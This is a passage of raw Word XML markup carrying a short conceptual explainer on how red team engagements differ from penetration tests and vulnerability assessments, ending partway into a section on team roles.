    <w:p w14:paraId="79E58050" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E841EC7" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5EF0CB8F" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="478580C1" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00BB134D" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>RED TEAM ENGAGEMENT VS PENETRATION TEST VS VULNERABILITY ASSESSMENT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5630A15C" w14:textId="3A6ED947" w:rsidR="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="003100"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="E6F6E6"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="003100"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="E6F6E6"/>
        </w:rPr>
        <w:t xml:space="preserve">A threat-based approach to security testing may use several </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="003100"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="E6F6E6"/>
        </w:rPr>
        <w:t>names;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="003100"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="E6F6E6"/>
        </w:rPr>
        <w:t xml:space="preserve"> Red Teaming, Threat Operations, Threat Assessment, Purple Teaming, Adversarial Assessment, Penetration Testing, Vulnerability Testing. These are not all the same, and it is important that the security industry defines terms to establish a common understanding. To help with this, all threat-based security testing in this post will be referred to as Red Teaming.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67A02EA3" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="003100"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="E6F6E6"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7150CE95" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="003100"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="E6F6E6"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00D1C30C" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Definition: </w:t>
      </w:r>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Red Teaming</w:t>
      </w:r>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> is the process of using tactics, techniques, and procedures (TTPs) to emulate a real-world threat with the goals of training and measuring the effectiveness of people, processes, and technology used to defend an environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A344CF3" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">In other words, red teaming is the process of emulating a threat using realistic techniques with the goal of training blue teams and/or measuring security </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>operations as a whole</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1378B27D" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Red teaming can provide a deep understand of the negative impacts an intelligent threat-actor can have against a target.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0628A510" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48CFBE4A" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E7FA4B9" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00BB134D" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:caps/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>RED TEAMING IN PERSPECTIVE TO ORGANIZATIONAL RISK</w:t>
      </w:r>
      <w:hyperlink r:id="rId18" w:anchor="red-teaming-in-perspective-to-organizational-risk" w:tooltip="Direct link to heading" w:history="1">
        <w:r w:rsidRPr="00BB134D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:caps/>
            <w:sz w:val="32"/>
            <w:szCs w:val="32"/>
          </w:rPr>
          <w:t>​</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="61DF2446" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>Security testing of any sort is ultimately about managing organization risk to threats.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="487F6DD1" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>Using an inverse pyramid, we can illustrate the relationships between Red Teaming, Penetration Testing, and Vulnerability Assessments. This will help further define what Red Teaming IS and IS NOT.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA4C357" w14:textId="3523C45A" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:ind w:left="-1276"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:noProof/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="206F0781" wp14:editId="04FEE063">
            <wp:extent cx="7161279" cy="3291840"/>
            <wp:effectExtent l="0" t="0" r="190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171777" cy="3296665"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AE6C755" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Vulnerability assessments</w:t>
      </w:r>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> tend to be wide in coverage but narrow in scope. Consider a vulnerability assessment of all enterprise workstations. The scope is very wide, but not very deep in context of organizational risks. What can be said about risk when flaws are found? Organizational risk can only be understood at the workstation level? Overall risk to an organization may be extrapolated to a small degree, but generally stays at that workstation level. Vulnerability assessments are good at reducing the attack surface but do not provide direct information in terms of organizational risk.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41414613" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BDDA331" w14:textId="00A576E6" w:rsidR="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Penetrations tests</w:t>
      </w:r>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> take vulnerability assessments to the next level by exploiting and proving out attack paths. Penetration tests can often look and feel like a red team engagement and even use some of the same tools or techniques. The key difference lies in the goals and intent. The goal of a penetration test is to execute an attack against a target system to identify and measure risks associated with the exploitation of a target’s attack surface. Organizational risks can be indirectly measured and are typically extrapolated from some technical attack. What about the people and processes? This is where red teaming fits.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="302FC2DB" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79003F93" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Red Team Engagements</w:t>
      </w:r>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> are </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>scenario based</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> engagements driven by specific threat goals. Red teaming focuses on security operations as a whole and includes people, processes, and technology. Red teaming specifically focuses on goals related to training blue teams or measuring how security operations can impact a threat’s ability to operate. Technical flaws are secondary to understanding how the threat was able to impact an </w:t>
      </w:r>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">organization’s operations or how security operations </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>was</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> able to impact a threat’s ability to operate.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1993D2B5" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>BOTTOM LINE</w:t>
      </w:r>
      <w:hyperlink r:id="rId20" w:anchor="bottom-line" w:tooltip="Direct link to heading" w:history="1">
        <w:r w:rsidRPr="00B517C0">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:caps/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>​</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5707173C" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerability assessment and Penetration tests are a means to identify technical flaws with the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>ultimate goal</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t xml:space="preserve"> of reducing a targets attack surface.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46133C74" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t xml:space="preserve">Red teaming is a goal driven scenario used to train or measure blue. Red teaming goals lie in understanding security </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>operations as a whole</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>. people, processes, and technology.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12E30176" w14:textId="77777777" w:rsidR="00FE2659" w:rsidRPr="00B517C0" w:rsidRDefault="00FE2659" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6EF33B49" w14:textId="77777777" w:rsidR="00FE2659" w:rsidRPr="00BB134D" w:rsidRDefault="00FE2659" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>ROLES AND RELATIONSHIPS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F6F2B43" w14:textId="47F87EA5" w:rsidR="00B517C0" w:rsidRDefault="00FE2659" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="003100"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="E6F6E6"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE2659">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="003100"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="E6F6E6"/>
        </w:rPr>
        <w:t xml:space="preserve">An effective Red Team is comprised of a team of individuals who can contribute to the overall success. Diversity is crucial, but the team </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FE2659">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="003100"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="E6F6E6"/>
        </w:rPr>
        <w:t>as a whole must</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FE2659">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="003100"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="E6F6E6"/>
        </w:rPr>
        <w:t xml:space="preserve"> be comprised of the core operator traits. A team can be even more successful when multiple team members contribute </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FE2659">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="003100"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="E6F6E6"/>
        </w:rPr>
        <w:t>in</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FE2659">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="003100"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="E6F6E6"/>
        </w:rPr>
        <w:t xml:space="preserve"> various areas. In addition to the Red Team itself, successful execution of an engagement requires the involvement of numerous roles and groups.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="085A9D35" w14:textId="77777777" w:rsidR="00FE2659" w:rsidRDefault="00FE2659" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="003100"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="E6F6E6"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17DE29D4" w14:textId="0B91571D" w:rsidR="00FE2659" w:rsidRDefault="00FE2659" w:rsidP="00BB134D">
      <w:pPr>
